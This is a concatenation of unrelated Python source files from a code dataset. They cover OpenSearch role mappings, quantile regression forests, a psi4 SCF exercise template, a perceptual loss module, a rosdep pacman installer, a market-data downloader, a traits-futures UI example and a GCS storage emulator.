# Raise exception because we did not receive valid properties
raise ValueError('Error modifying mapping for role {} - Include at least one of: users, '
'backendroles or hosts keys in the properties argument'.format(role))
# Retrieve existing properties of the role mapping:
rolemapping = view_rolemapping(role)
for property in PROPERTIES_KEYS:
if property not in rolemapping[role]:
rolemapping[role][property] = list()
if action is "merge":
# Merge the requested properties with existing properties in the role mapping.
rolemapping[role]['users'] = \
sorted(set(rolemapping[role]['users'] + properties.get('users', [])))
rolemapping[role]['backendroles'] = \
sorted(set(rolemapping[role]['backendroles'] + properties.get('backendroles', [])))
rolemapping[role]['hosts'] = \
sorted(set(rolemapping[role]['hosts'] + properties.get('hosts', [])))
_send_api_request(role, rolemapping[role])
return
if action is "split":
# Remove the requested properties from existing properties in the role mapping.
rolemapping[role]['users'] = [item for item in rolemapping[role]['users']
if item not in properties['users']]
rolemapping[role]['backendroles'] = [item for item in rolemapping[role]['backendroles']
if item not in properties['backendroles']]
rolemapping[role]['hosts'] = [item for item in rolemapping[role]['hosts']
if item not in properties['hosts']]
_send_api_request(role, rolemapping[role])
return
# No merge or split action, overwrite existing properties:
_send_api_request(role, properties)
def list_rolemappings_for_user(user, roles=None, skip_missing_roles=False):
"""Get list of rolemappings that contain the given user. It is possible to add a list of roles to check.
If no list is added, all rolemappings are evaluated. Non-existent roles can be excluded.
:param str user: Name of user
:param list roles: List of rolemappings to be checked for the given user
:param bool skip_missing_roles: Skip missing roles or throw ViewRoleMappingException
:returns list: list of rolemappings with the given user
:raises: ViewRoleMappingException
"""
if roles:
if skip_missing_roles:
user_rolemappings = list()
for role in roles:
try:
if user in view_rolemapping(role)[role]['users']:
user_rolemappings.append(role)
except ViewRoleMappingException:
pass
else:
user_rolemappings = [role for role in roles if user in view_rolemapping(role)[role]['users']]
else:
user_rolemappings = [r for r, p in view_all_rolemappings().items() if user in p['users']]
return sorted(set(user_rolemappings))
| StarcoderdataPython |
3284417 | # this file replaces quantile/ensemble.py file of scikit-garden package
# this code, unlike the original code, makes use of all available cores when doing scoring
# also, unlike the original code, predict() function in the new code can generate predictions for multiple quantiles
import numpy as np
from numpy import ma
from sklearn.ensemble.forest import ForestRegressor
from sklearn.utils import check_array
from sklearn.utils import check_random_state
from sklearn.utils import check_X_y
from joblib import Parallel, delayed
from skgarden.quantile.tree import DecisionTreeQuantileRegressor
from skgarden.quantile.ensemble import generate_sample_indices
from ensemble_parallel_utils import weighted_percentile_vectorized
class BaseForestQuantileRegressor(ForestRegressor):
"""Training and scoring of Quantile Regression Random Forest
Training code is the same as in scikit-garden package. Scoring code uses all cores, unlike the original
code in scikit-garden.
Attributes:
y_train_ : array-like, shape=(n_samples,)
Cache the target values at fit time.
y_weights_ : array-like, shape=(n_estimators, n_samples)
y_weights_[i, j] is the weight given to sample ``j` while
estimator ``i`` is fit. If bootstrap is set to True, this
reduces to a 2-D array of ones.
y_train_leaves_ : array-like, shape=(n_estimators, n_samples)
y_train_leaves_[i, j] provides the leaf node that y_train_[i]
ends up when estimator j is fit. If y_train_[i] is given
a weight of zero when estimator j is fit, then the value is -1.
"""
def fit(self, X, y):
"""Builds a forest from the training set (X, y).
Args:
X : array-like or sparse matrix, shape = [n_samples, n_features]
The training input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csc_matrix``.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
The target values (class labels) as integers or strings.
sample_weight : array-like, shape = [n_samples] or None
Sample weights. If None, then samples are equally weighted. Splits
that would create child nodes with net zero or negative weight are
ignored while searching for a split in each node. Splits are also
ignored if they would result in any single class carrying a
negative weight in either child node.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
X_idx_sorted : array-like, shape = [n_samples, n_features], optional
The indexes of the sorted training input samples. If many tree
are grown on the same dataset, this allows the ordering to be
cached between trees. If None, the data will be sorted here.
Don't use this parameter unless you know what to do.
Returns:
self : object
Returns self.
"""
# apply method requires X to be of dtype np.float32
X, y = check_X_y(X, y, accept_sparse="csc", dtype=np.float32, multi_output=False)
super(BaseForestQuantileRegressor, self).fit(X, y)
self.y_train_ = y
self.y_train_leaves_ = -np.ones((self.n_estimators, len(y)), dtype=np.int32)
self.y_weights_ = np.zeros_like((self.y_train_leaves_), dtype=np.float32)
for i, est in enumerate(self.estimators_):
if self.bootstrap:
bootstrap_indices = generate_sample_indices(est.random_state, len(y))
else:
bootstrap_indices = np.arange(len(y))
est_weights = np.bincount(bootstrap_indices, minlength=len(y))
y_train_leaves = est.y_train_leaves_
for curr_leaf in np.unique(y_train_leaves):
y_ind = y_train_leaves == curr_leaf
self.y_weights_[i, y_ind] = est_weights[y_ind] / np.sum(est_weights[y_ind])
self.y_train_leaves_[i, bootstrap_indices] = y_train_leaves[bootstrap_indices]
return self
def _compute_percentiles(self, x_leaf, quantiles, sorter):
mask = self.y_train_leaves_ != np.expand_dims(x_leaf, 1)
x_weights = ma.masked_array(self.y_weights_, mask)
weights = x_weights.sum(axis=0)
return weighted_percentile_vectorized(self.y_train_, quantiles, weights, sorter)
def predict(self, X, quantiles=None):
"""Predict regression value for X.
Args:
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
quantiles : list of ints, optional
list of value ranging from 0 to 100. By default, the mean is returned.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
Returns:
y : array of shape = [n_samples]
If quantile is set to None, then return E(Y | X). Else return
y such that F(Y=y | x) = quantile.
"""
# apply method requires X to be of dtype np.float32
X = check_array(X, dtype=np.float32, accept_sparse="csc")
if quantiles is None:
return super(BaseForestQuantileRegressor, self).predict(X)
sorter = np.argsort(self.y_train_)
X_leaves = self.apply(X)
with Parallel(n_jobs=-1, backend="multiprocessing", batch_size=10) as p:
percentiles = p(delayed(self._compute_percentiles)(x_leaf, quantiles, sorter) for x_leaf in X_leaves)
return np.array(percentiles)
class RandomForestQuantileRegressor(BaseForestQuantileRegressor):
"""A random forest regressor that provides quantile estimates.
A random forest is a meta estimator that fits a number of classifying
decision trees on various sub-samples of the dataset and use averaging
to improve the predictive accuracy and control over-fitting.
The sub-sample size is always the same as the original
input sample size but the samples are drawn with replacement if
`bootstrap=True` (default).
References:
<NAME>, Quantile Regression Forests
http://www.jmlr.org/papers/volume7/meinshausen06a/meinshausen06a.pdf
Attributes:
estimators_ : list of DecisionTreeQuantileRegressor
The collection of fitted sub-estimators.
feature_importances_ : array of shape = [n_features]
The feature importances (the higher, the more important the feature).
n_features_ : int
The number of features when ``fit`` is performed.
n_outputs_ : int
The number of outputs when ``fit`` is performed.
oob_score_ : float
Score of the training dataset obtained using an out-of-bag estimate.
oob_prediction_ : array of shape = [n_samples]
Prediction computed with out-of-bag estimate on the training set.
"""
def __init__(
self,
n_estimators=10,
criterion="mse",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.0,
max_features="auto",
max_leaf_nodes=None,
bootstrap=True,
oob_score=False,
n_jobs=1,
random_state=None,
verbose=0,
warm_start=False,
):
"""Initialize RandomForestQuantileRegressor class
Args:
n_estimators : integer, optional (default=10)
The number of trees in the forest.
criterion : string, optional (default="mse")
The function to measure the quality of a split. Supported criteria
are "mse" for the mean squared error, which is equal to variance
reduction as feature selection criterion, and "mae" for the mean
absolute error.
.. versionadded:: 0.18
Mean Absolute Error (MAE) criterion.
max_features : int, float, string or None, optional (default="auto")
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_depth : integer or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int, float, optional (default=2)
The minimum number of samples required to split an internal node:
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a percentage and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
.. versionchanged:: 0.18
Added float values for percentages.
min_samples_leaf : int, float, optional (default=1)
The minimum number of samples required to be at a leaf node:
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a percentage and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
.. versionchanged:: 0.18
Added float values for percentages.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the sum total of weights (of all
the input samples) required to be at a leaf node. Samples have
equal weight when sample_weight is not provided.
max_leaf_nodes : int or None, optional (default=None)
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
bootstrap : boolean, optional (default=True)
Whether bootstrap samples are used when building trees.
oob_score : bool, optional (default=False)
whether to use out-of-bag samples to estimate
the R^2 on unseen data.
n_jobs : integer, optional (default=1)
The number of jobs to run in parallel for both `fit` and `predict`.
If -1, then the number of jobs is set to the number of cores.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
verbose : int, optional (default=0)
Controls the verbosity of the tree building process.
warm_start : bool, optional (default=False)
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest.
"""
super(RandomForestQuantileRegressor, self).__init__(
base_estimator=DecisionTreeQuantileRegressor(),
n_estimators=n_estimators,
estimator_params=(
"criterion",
"max_depth",
"min_samples_split",
"min_samples_leaf",
"min_weight_fraction_leaf",
"max_features",
"max_leaf_nodes",
"random_state",
),
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start,
)
self.criterion = criterion
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.max_leaf_nodes = max_leaf_nodes
| StarcoderdataPython |
147997 | #!/usr/bin/env python
"""create_min_chi2_table.py.
Create Table of minimum Chi_2 values and save to a table.
"""
import argparse
import logging
import sys
from joblib import Parallel, delayed
from logutils import BraceMessage as __
from bin.coadd_analysis_script import main as coadd_analysis
from bin.coadd_chi2_db import main as coadd_db
from simulators.iam_script import main
def parse_args(args):
"""Take care of all the argparse stuff.
:returns: the args
"""
parser = argparse.ArgumentParser(description='Do iam simulations on stars.')
parser.add_argument('star', help='Star names', default=None)
parser.add_argument('--suffix', help='Suffix to add to the file names.', default="")
parser.add_argument("-n", "--n_jobs", help="Number of parallel Jobs", default=1, type=int)
parser.add_argument('-v', '--verbose', action="store_true",
help='Turn on Verbose.')
return parser.parse_args(args)
if __name__ == "__main__":
args = parse_args(sys.argv[1:])
star = args.star
n_jobs = args.pop("n_jobs", 1)
verbose = args.pop("verbose", False)
logging.info(__("Performing simulations on", star))
obsnums = {"HD30501": ["1", "2a", "2b", "3"], "HD211847": ["1", "2"], "HD4747": ["1"]}
def parallelized_main(opts, chip):
"""Run main with different chips in parallel."""
opts["chip"] = chip
return main(**opts)
for obs in obsnums[star]:
iam_opts = {"star": star, "obsnum": obs, "parallel": False, "more_id": args.suffix}
res = Parallel(n_jobs=n_jobs)(delayed(parallelized_main)(iam_opts, chip)
for chip in range(1, 5))
if not sum(res):
print("\nDoing analysis after simulations!\n")
coadd_db(star, obs, args.suffix, replace=True,
verbose=verbose, move=True)
coadd_analysis(star, obs, suffix=args.suffix,
echo=False, mode="all", verbose=verbose, npars=3)
print("\nFinished the db analysis after iam_script simulations!\n")
sys.exit(0)
| StarcoderdataPython |
1622780 | <reponame>sokazaki/mmediting
import torch
import torch.nn as nn
import torchvision.models.vgg as vgg
from mmcv.runner import load_checkpoint
from mmedit.utils import get_root_logger
from ..registry import LOSSES
class PerceptualVGG(nn.Module):
"""VGG network used in calculating perceptual loss.
In this implementation, we allow users to choose whether use normalization
in the input feature and the type of vgg network. Note that the pretrained
path must fit the vgg type.
Args:
layer_name_list (list[str]): According to the name in this list,
forward function will return the corresponding features. This
list contains the name each layer in `vgg.feature`. An example
of this list is ['4', '10'].
vgg_type (str): Set the type of vgg network. Default: 'vgg19'.
use_input_norm (bool): If True, normalize the input image.
Importantly, the input feature must in the range [0, 1].
Default: True.
pretrained (str): Path for pretrained weights. Default:
'torchvision://vgg19'
"""
def __init__(self,
layer_name_list,
vgg_type='vgg19',
use_input_norm=True,
pretrained='torchvision://vgg19'):
super().__init__()
if pretrained.startswith('torchvision://'):
assert vgg_type in pretrained
self.layer_name_list = layer_name_list
self.use_input_norm = use_input_norm
# get vgg model and load pretrained vgg weight
# remove _vgg from attributes to avoid `find_unused_parameters` bug
_vgg = getattr(vgg, vgg_type)()
self.init_weights(_vgg, pretrained)
num_layers = max(map(int, layer_name_list)) + 1
assert len(_vgg.features) >= num_layers
# only borrow layers that will be used from _vgg to avoid unused params
self.vgg_layers = _vgg.features[:num_layers]
if self.use_input_norm:
# the mean is for image with range [0, 1]
self.register_buffer(
'mean',
torch.Tensor([0.485, 0.456, 0.406]).view(1, 3, 1, 1))
# the std is for image with range [-1, 1]
self.register_buffer(
'std',
torch.Tensor([0.229, 0.224, 0.225]).view(1, 3, 1, 1))
for v in self.vgg_layers.parameters():
v.requires_grad = False
def forward(self, x):
"""Forward function.
Args:
x (Tensor): Input tensor with shape (n, c, h, w).
Returns:
Tensor: Forward results.
"""
if self.use_input_norm:
x = (x - self.mean) / self.std
output = {}
for name, module in self.vgg_layers.named_children():
x = module(x)
if name in self.layer_name_list:
output[name] = x.clone()
return output
def init_weights(self, model, pretrained):
"""Init weights.
Args:
model (nn.Module): Models to be inited.
pretrained (str): Path for pretrained weights.
"""
logger = get_root_logger()
load_checkpoint(model, pretrained, logger=logger)
@LOSSES.register_module()
class PerceptualLoss(nn.Module):
"""Perceptual loss with commonly used style loss.
Args:
layers_weights (dict): The weight for each layer of vgg feature.
Here is an example: {'4': 1., '9': 1., '18': 1.}, which means the
5th, 10th and 18th feature layer will be extracted with weight 1.0
in calculting losses.
vgg_type (str): The type of vgg network used as feature extractor.
Default: 'vgg19'.
use_input_norm (bool): If True, normalize the input image in vgg.
Default: True.
perceptual_weight (float): If `perceptual_weight > 0`, the perceptual
loss will be calculated and the loss will multiplied by the
weight. Default: 1.0.
style_weight (float): If `style_weight > 0`, the style loss will be
calculated and the loss will multiplied by the weight.
Default: 1.0.
norm_img (bool): If True, the image will be normed to [0, 1]. Note that
this is different from the `use_input_norm` which norm the input in
in forward function of vgg according to the statistics of dataset.
Importantly, the input image must be in range [-1, 1].
pretrained (str): Path for pretrained weights. Default:
'torchvision://vgg19'
"""
def __init__(self,
layer_weights,
vgg_type='vgg19',
use_input_norm=True,
perceptual_weight=1.0,
style_weight=1.0,
norm_img=True,
pretrained='torchvision://vgg19',
criterion='l1'):
super().__init__()
self.norm_img = norm_img
self.perceptual_weight = perceptual_weight
self.style_weight = style_weight
self.layer_weights = layer_weights
self.vgg = PerceptualVGG(
layer_name_list=list(layer_weights.keys()),
vgg_type=vgg_type,
use_input_norm=use_input_norm,
pretrained=pretrained)
if criterion == 'l1':
self.criterion = torch.nn.L1Loss()
elif criterion == 'mse':
self.criterion = torch.nn.MSELoss()
else:
raise NotImplementedError(
f'{criterion} criterion has not been supported in'
' this version.')
def forward(self, x, gt):
"""Forward function.
Args:
x (Tensor): Input tensor with shape (n, c, h, w).
gt (Tensor): Ground-truth tensor with shape (n, c, h, w).
Returns:
Tensor: Forward results.
"""
if self.norm_img:
x = (x + 1.) * 0.5
gt = (gt + 1.) * 0.5
# extract vgg features
x_features = self.vgg(x)
gt_features = self.vgg(gt.detach())
# calculate perceptual loss
if self.perceptual_weight > 0:
percep_loss = 0
for k in x_features.keys():
percep_loss += self.criterion(
x_features[k], gt_features[k]) * self.layer_weights[k]
percep_loss *= self.perceptual_weight
else:
percep_loss = None
# calculate style loss
if self.style_weight > 0:
style_loss = 0
for k in x_features.keys():
style_loss += self.criterion(
self._gram_mat(x_features[k]),
self._gram_mat(gt_features[k])) * self.layer_weights[k]
style_loss *= self.style_weight
else:
style_loss = None
return percep_loss, style_loss
def _gram_mat(self, x):
"""Calculate Gram matrix.
Args:
x (torch.Tensor): Tensor with shape of (n, c, h, w).
Returns:
torch.Tensor: Gram matrix.
"""
(n, c, h, w) = x.size()
features = x.view(n, c, w * h)
features_t = features.transpose(1, 2)
gram = features.bmm(features_t) / (c * h * w)
return gram
| StarcoderdataPython |
193823 | <gh_stars>10-100
# Copyright (c) 2009, <NAME>, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# Author <NAME>/<EMAIL>
import subprocess
from rospkg.os_detect import OS_ARCH
from ..installers import PackageManagerInstaller
from .source import SOURCE_INSTALLER
PACMAN_INSTALLER = 'pacman'
def register_installers(context):
context.set_installer(PACMAN_INSTALLER, PacmanInstaller())
def register_platforms(context):
context.add_os_installer_key(OS_ARCH, SOURCE_INSTALLER)
context.add_os_installer_key(OS_ARCH, PACMAN_INSTALLER)
context.set_default_os_installer_key(OS_ARCH, lambda self: PACMAN_INSTALLER)
def pacman_detect_single(p):
return not subprocess.call(['pacman', '-T', p], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def pacman_detect(packages):
return [p for p in packages if pacman_detect_single(p)]
class PacmanInstaller(PackageManagerInstaller):
def __init__(self):
super(PacmanInstaller, self).__init__(pacman_detect)
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
packages = self.get_packages_to_install(resolved, reinstall=reinstall)
if not packages:
return []
command = ['pacman', '-S']
if not interactive:
command.append('--noconfirm')
if not reinstall:
command.append('--needed')
if quiet:
command.append('-q')
return [self.elevate_priv(command + packages)]
| StarcoderdataPython |
4826054 | #!/usr/bin/python3
"""
Demonstrates the use of Psi4 from Python level.
Useful notes:
o Use psi4.core module for most of the work
o Useful modules within psi4.core:
- MintsHelper
- Molecule
- BasisSet
- ExternalPotential
others
o Psi4 defines its own matrix type (psi4.core.Matrix).
Extracting numpy.array is easy:
numpy_array = numpy.asarray(psi4_matrix)
Creating Psi4 matrix from array is also easy:
psi4_matrix = psi4.core.Matrix.from_array(numpy_array)
o To compute 1-el potential matrix for a set of charges
use ExternalPotential (charge positions are to be provided in Angstroms)
unless charges are just nuclei within the basis set (in this case use of ao_potential method
of MintsHelper is easier).
o ao_potential method of MintsHelper is limited only for nuclei within the same basis set
(the nuclei are taken from the first basis set axis, for example:
mints = MintsHelper(basis_X)
mints.ao_potential() -> nuclei taken from basis of mints object (basis_X)
mints.ao_potential(basis_1, basis_2) -> nuclei taken from basis_1
o Psi4 has efficient and easy to use method of defining fragments within a molecule (use '--' separator).
Defining ghost atoms and extracting fragment i in the multimer-centred basis set is also very straighforward
(method extract_subsets(...) of psi4.core.Molecule)
---
<NAME>
"""
import psi4
import numpy
MAX_NBF = 128
class SCF:
"""
---------------------------------------------------------------------------------------------------------------
Self-Consistent Field (SCF) Procedure for Hartree-Fock Model
---------------------------------------------------------------------------------------------------------------
Demo for RHF-SCF method (closed shells). Implements SCF algorithm
with primitive damping of the AO Fock matrix.
Usage:
scf = SCF(molecule)
scf.run(maxit=30, conv=1.0e-7, guess=None, damp=0.01, ndamp=10, verbose=True)
The above example runs SCF on 'molecule' psi4.core.Molecule object
starting from core Hamiltonian as guess (guess=None)
and convergence 1.0E-7 A.U. in total energy with 30 maximum iterations
(10 of which are performed by damping of the Fock matrix with damping coefficient of 0.01).
The SCF iterations are printed to standard output (verbose=True).
---------------------------------------------------------------------------------------------------------------
Last Revision: Gundelfingen, May 4th 2018
"""
def __init__(self, mol):
"Initialize BasisSet, Wavefunction and JK objects"
# Basis set
self._bfs =
# Wavefunction
self._wfn =
# Number of alpha electrons
self._ndocc =
# Integral calculator
self._mints =
# JK object
self._jk =
### Accessors
# nuclear repulsion energy
self.e_nuc =
# Total Energy
self.E = None
# Density Matrix
self.D = None
# LCAO-MO coeffs (occ)
self.Co= None
# LCAO-MO coeffs (occ+vir)
self.C = None
# Fock matrix
self.F = None
# Orbital energies
self.eps = None
# Hcore matrix
self.H = None
# Overlap integrals and orthogonalizer
self.S =
self.X = self._orthogonalizer(self.S)
return
def run(self, maxit=30, conv=1.0e-7, guess=None, damp=0.01, ndamp=10, verbose=True):#TODO
"Solve SCF (public interface)"
if guess is None:
# Form Hcore
...
else: H = numpy.asarray(guess)
self.H = H.copy()
self._run(H, maxit, conv, damp, ndamp, verbose)
return
# --- protected --- #
def _run(self, H, maxit, conv, damp, ndamp, verbose):#TODO
"Solve SCF (protected interface)"
# [1] Guess density matrix
# [2] Start iteration cycles
while (abs(e_old - e_new) > conv):
niter += 1
# [3] form Fock matrix
# [4] compute total energy
if verbose:
print (" @SCF Iter {:02} E = {:14.8f}".format(niter, e_new))
# [5] transform Fock matrix to orthogonal AO basis
# [6] diagonalize the Fock matrix
# [7] convert LCAO-MO coefficiets to non-orthogonal AO basis
# [8] form density matrix
# [9] save current data
if niter > maxit: break
return
def _orthogonalizer(self, S):#TODO
"Form orthogonalizer"
return NotImplementedError
| StarcoderdataPython |
1772990 | <filename>console/helper/formatter_helper.py
# -*- coding: utf-8 -*-
from helper import Helper
from ..formatter.output_formatter import OutputFormatter
class FormatterHelper(Helper):
def format_section(self, section, message, style='info'):
return '<%s>[%s]</%s> %s' % (style, section, style, message)
def format_block(self, messages, style, large=False):
messages = [messages] if not isinstance(messages, (list, tuple)) else messages
l = 0
lines = []
for message in messages:
message = OutputFormatter.escape(message)
lines.append((' %s ' if large else ' %s ') % message)
l = max(len(message) + (4 if large else 2), l)
messages = ' ' * l if large else []
for line in lines:
messages.append(line + ' ' * (l - len(line)))
if large:
messages.append(' ' * l)
for message in messages:
message = '<%s>%s</%s>' % (style, message, style)
return '\n'.join(messages)
def get_name(self):
return 'formatter'
| StarcoderdataPython |
3366408 | # Look at the tick data for October and then using file 07
import os
import time
import pandas as pd
import requests, zipfile, io
# Doing 4500 to 4700 (4500-4699 inclusive)
# for num in range(4400, 4500):
# for num in range(4300, 4400):
def main():
num_hvnt_worked = list()
print("Downloading data...")
for num in range(4700, 4750):
try:
print(f"Downloading zip no. {num} is in progress")
download_zip(f"https://links.sgx.com/1.0.0/derivatives-historical/{num}/WEBPXTICK_DT.zip")
print(f"Zip {num} has been downloaded")
except Exception as e:
print(f"This is the exception that has occured for {num}: \n{e}")
num_hvnt_worked.append(num)
print("Parsing through required data...")
parser()
print(num_hvnt_worked)
def parser(thumb_drive_directory="/Volumes/TICK/tick_info"):
thumb_drive_list = os.listdir(thumb_drive_directory)
index = 0
for paths in thumb_drive_list:
index += 1
# Reading in the relevant information from the big file
df = pd.read_csv(f"{thumb_drive_directory}/{paths}")
# Converting the relevant information into a csv file
date = str(paths)
date = paths.split('.')[0]
date = date.split('-')[1]
df = df.loc[(df['Comm'] == "TF")] # Only require TF right now
df.to_csv(f"/Volumes/TICK/required_info/info{date}.csv", index=False)
print(f"Index has been made with Filename /Volumes/TICK/required_info/info{date}.csv")
os.remove(f"{thumb_drive_directory}/{paths}") # Delete the big zip file collected
print(f"{thumb_drive_directory}/{paths} has been removed")
print(f"Total files deleted: {index}")
def download_zip(zip_file_url):
"""
Takes a single argument: the zip url that we require
Stores the downloaded zip file in the usb/thumb_drive_directory
"""
try:
r = requests.get(zip_file_url, stream=True)
print("r")
z = zipfile.ZipFile(io.BytesIO(r.content))
print("z")
z.extractall("/Volumes/TICK/tick_info")
print("ze")
print("We are gonna take a break before going for the next one")
time.sleep(10)
except requests.exceptions.ConnectionError:
r.status_code = "Connection refused"
print("ConnectionError")
time.sleep(10)
if __name__ == "__main__":
start_time = time.time()
main()
print("--- %s seconds ---" % (time.time() - start_time))
| StarcoderdataPython |
168851 | # (C) Copyright 2018-2021 Enthought, Inc., Austin, TX
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in LICENSE.txt and may be redistributed only under
# the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
#
# Thanks for using Enthought open source!
"""
Example of a custom background job type.
"""
from traits.api import (
Bool,
Button,
HasStrictTraits,
Instance,
observe,
Property,
Str,
)
from traits_futures.api import TraitsExecutor
from traitsui.api import HGroup, UItem, View
from fizz_buzz_task import FizzBuzzFuture, submit_fizz_buzz
class FizzBuzzUI(HasStrictTraits):
#: The executor to submit tasks to.
traits_executor = Instance(TraitsExecutor)
#: The future object returned on task submission.
future = Instance(FizzBuzzFuture)
#: Status message showing current state or the last-received result.
message = Str("Ready")
#: Button to calculate, plus its enabled state.
calculate = Button()
can_calculate = Property(Bool(), observe="future")
#: Button to cancel, plus its enabled state.
cancel = Button()
can_cancel = Property(Bool(), observe="future.cancellable")
@observe("calculate")
def _submit_calculation(self, event):
self.message = "Running"
self.future = submit_fizz_buzz(self.traits_executor)
@observe("cancel")
def _cancel_running_task(self, event):
self.message = "Cancelling"
self.future.cancel()
@observe("future:fizz")
def _report_fizz(self, event):
self.message = "Fizz {}".format(event.new)
@observe("future:buzz")
def _report_buzz(self, event):
self.message = "Buzz {}".format(event.new)
@observe("future:fizz_buzz")
def _report_fizz_buzz(self, event):
self.message = "FIZZ BUZZ! {}".format(event.new)
@observe("future:done")
def _reset_future(self, event):
self.message = "Ready"
self.future = None
def _get_can_calculate(self):
return self.future is None
def _get_can_cancel(self):
return self.future is not None and self.future.cancellable
traits_view = View(
UItem("message", style="readonly"),
HGroup(
UItem("calculate", enabled_when="can_calculate"),
UItem("cancel", enabled_when="can_cancel"),
),
resizable=True,
)
if __name__ == "__main__":
traits_executor = TraitsExecutor()
try:
FizzBuzzUI(traits_executor=traits_executor).configure_traits()
finally:
traits_executor.shutdown()
| StarcoderdataPython |
3364514 | <reponame>pylangstudy/201706
try:
print('try')
raise Exception
except Exception as e:
print('except')
finally:
print('finally')
| StarcoderdataPython |
3284790 | import datetime
import json
import logging
import os
import fs
from fs.errors import FileExpected, ResourceNotFound
from .exceptions import Conflict, NotFound
from .settings import STORAGE_BASE, STORAGE_DIR
logger = logging.getLogger(__name__)
class Storage(object):
def __init__(self, use_memory_fs=False, data_dir=STORAGE_BASE):
if not os.path.isabs(data_dir):
raise ValueError("data_dir must be an absolute path")
self._use_memory_fs = use_memory_fs
self._data_dir = data_dir
self._pwd = fs.open_fs(data_dir)
try:
self._fs = self._pwd.makedir(STORAGE_DIR)
except fs.errors.DirectoryExists:
self._fs = self._pwd.opendir(STORAGE_DIR)
self._read_config_from_file()
def _write_config_to_file(self):
data = {
"buckets": self.buckets,
"objects": self.objects,
"resumable": self.resumable,
}
with self._fs.open(".meta", mode="w") as meta:
json.dump(data, meta, indent=2)
def _read_config_from_file(self):
try:
with self._fs.open(".meta", mode="r") as meta:
data = json.load(meta)
self.buckets = data.get("buckets")
self.objects = data.get("objects")
self.resumable = data.get("resumable")
except ResourceNotFound:
self.buckets = {}
self.objects = {}
self.resumable = {}
def _get_or_create_dir(self, bucket_name, file_name):
try:
bucket_dir = self._fs.makedir(bucket_name)
except fs.errors.DirectoryExists:
bucket_dir = self._fs.opendir(bucket_name)
dir_name = fs.path.dirname(file_name)
return bucket_dir.makedirs(dir_name, recreate=True)
def get_storage_base(self):
"""Returns the pyfilesystem-compatible fs path to the storage
This is the OSFS if using disk storage, or "mem://" otherwise.
See https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems for more info
Returns:
string -- The relevant filesystm
"""
if self._use_memory_fs:
return "mem://"
else:
return self._data_dir
def get_bucket(self, bucket_name):
"""Get the bucket resourec object given the bucket name
Arguments:
bucket_name {str} -- Name of the bucket
Returns:
dict -- GCS-like Bucket resource
"""
return self.buckets.get(bucket_name)
def get_file_list(self, bucket_name, prefix=None, delimiter=None):
"""Lists all the blobs in the bucket that begin with the prefix.
This can be used to list all blobs in a "folder", e.g. "public/".
The delimiter argument can be used to restrict the results to only the
"files" in the given "folder". Without the delimiter, the entire tree under
the prefix is returned. For example, given these blobs:
a/1.txt
a/b/2.txt
